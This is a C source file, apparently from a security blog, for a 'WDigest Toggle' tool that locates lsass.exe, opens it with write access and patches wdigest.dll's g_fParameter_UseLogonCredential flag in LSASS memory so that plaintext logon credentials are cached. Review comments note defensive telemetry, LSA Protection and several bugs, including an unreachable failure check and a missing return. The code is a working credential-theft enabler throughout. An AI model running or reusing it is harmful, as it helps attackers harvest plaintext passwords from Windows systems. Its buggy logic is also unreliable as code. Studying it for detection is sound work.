#blog
#include <stdio.h> | |
#include <windows.h> | |
#include <tlhelp32.h> | |
// Signature for inst to cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx
// Byte pattern that ToggleWDigest memcmp()s against the wdigest.dll image mapped
// into this process; the 4 bytes that follow a match are read as a rel32
// displacement to reach the global. NOTE(review): the pattern embeds
// build-specific displacement bytes, so it presumably matches only the one
// wdigest.dll build it was captured from.
unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d };
// Open a handle to the LSASS process
// Requests PROCESS_VM_WRITE alongside query/read access. A handle to lsass.exe
// with write access is exactly what WriteToLsass needs and is also the
// high-signal event defenders alert on (e.g. Sysmon ProcessAccess / EDR LSASS
// access telemetry); with LSA Protection (RunAsPPL) enabled, an unprotected
// process is denied this access.
// Returns the handle from OpenProcess, which is NULL (not INVALID_HANDLE_VALUE)
// on failure.
HANDLE GrabLsassHandle(int pid) {
    HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, pid);
    return procHandle;
}
// Write memory to LSASS process
// Thin wrapper over WriteProcessMemory. The BOOL result is discarded, so a
// denied or failed write is only observable through the returned count
// (bytesWritten starts at 0); the single caller, ToggleWDigest, never inspects it.
// Returns the number of bytes WriteProcessMemory reported as written.
SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) {
    SIZE_T bytesWritten = 0;
    WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten);
    return bytesWritten;
}
// Searches for lsass.exe PID
// Walks a Toolhelp process snapshot and returns the PID of the first entry
// whose image name is exactly "lsass.exe", or 0 when none is found.
// NOTE(review): the found path returns from inside the loop, so hSnapshot is
// only closed on the not-found path (handle leaks on success).
// NOTE(review): the entry filled by Process32First is never compared — the
// loop begins with Process32Next — and a failed CreateToolhelp32Snapshot
// (INVALID_HANDLE_VALUE) is not checked.
int GetLsassPid() {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(hSnapshot, &entry)) {
        while (Process32Next(hSnapshot, &entry)) {
            if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
                return entry.th32ProcessID;
            }
        }
    }
    CloseHandle(hSnapshot);
    return 0;
}
// Locates wdigest!g_fParameter_UseLogonCredential by scanning this process's
// copy of wdigest.dll for `signature`, then writes the value 1 to that address
// inside LSASS via hLsass. Setting this flag is the in-memory equivalent of the
// WDigest UseLogonCredential registry setting and makes LSASS keep plaintext
// credentials cached; that is why LSASS write access (GrabLsassHandle) and
// Credential Guard / LSA Protection are the controls that matter here.
// Returns 1 on the two reported failure paths; NOTE(review): there is no
// return statement on the success path, so the int result is indeterminate
// there (main ignores it anyway).
int ToggleWDigest(HANDLE hLsass) {
    unsigned char* ptr = 0;
    ULONG value = 1;
    // Base address of wdigest.dll in *this* process; used as the scan start.
    ptr = (unsigned char*)LoadLibraryA("wdigest.dll");
    if (ptr == NULL) {
        printf("[x] Error: Could not load wdigest.dll into process\n");
        return 1;
    }
    printf("[*] Searching for g_fParameter_UseLogonCredential\n");
    // Hard-coded scan length of 0x220000 bytes from the module base.
    // NOTE(review): not derived from the image's actual size, so the scan can
    // read past the mapped module if the DLL is smaller than that.
    for (int i = 0; i < 0x220000; i++) {
        if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) {
            if (memcmp(ptr + i, signature, sizeof(signature)) == 0) {
                // Advance past the matched bytes, then apply the rel32
                // displacement that follows (+4 for the displacement itself)
                // to land on the global's address.
                ptr += i + sizeof(signature);
                ptr += (*(DWORD*)ptr) + 4;
                break;
            }
        }
    }
    // NOTE(review): ptr already holds the non-NULL module base from
    // LoadLibraryA, so this condition can never be true; when the signature is
    // absent, the write below targets the module base instead of the global
    // (in LSASS that most likely corrupts wdigest.dll's image — an LSASS crash
    // is itself a loud indicator for defenders).
    if (ptr == (unsigned char*)0) {
        printf("[x] Error: Could not find signature in wdigest.dll\n");
        return 1;
    }
    printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr);
    printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n");
    // No need to check in lsass, as Windows ASLR loads at the same address across processes
    // (the address resolved in this process is reused as-is for the LSASS write;
    // the returned byte count is not checked).
    WriteToLsass(hLsass, ptr, &value, sizeof(value));
    printf("[*] Done... wdigest credential caching should now be on\n");
}
// Entry point: find lsass.exe, open it with write access, and hand the handle
// to ToggleWDigest. Exits 1 if LSASS cannot be found or opened; the result of
// ToggleWDigest and the LSASS handle are not checked or closed.
int main()
{
    int lsassPid;
    HANDLE hLsass;
    printf("[ WDigest Toggle ]\n");
    printf(" @_xpn_\n\n");
    lsassPid = GetLsassPid();
    if (lsassPid == 0) {
        printf("[x] Error: Could not find lsass.exe process\n");
        return 1;
    }
    hLsass = GrabLsassHandle(lsassPid);
    // NOTE(review): OpenProcess reports failure with NULL, not
    // INVALID_HANDLE_VALUE, so a denied open (e.g. under LSA Protection) passes
    // this check and the later WriteProcessMemory simply fails silently.
    if (hLsass == INVALID_HANDLE_VALUE) {
        printf("[x] Error: Could not open lsass.exe\n");
        return 1;
    }
    ToggleWDigest(hLsass);
}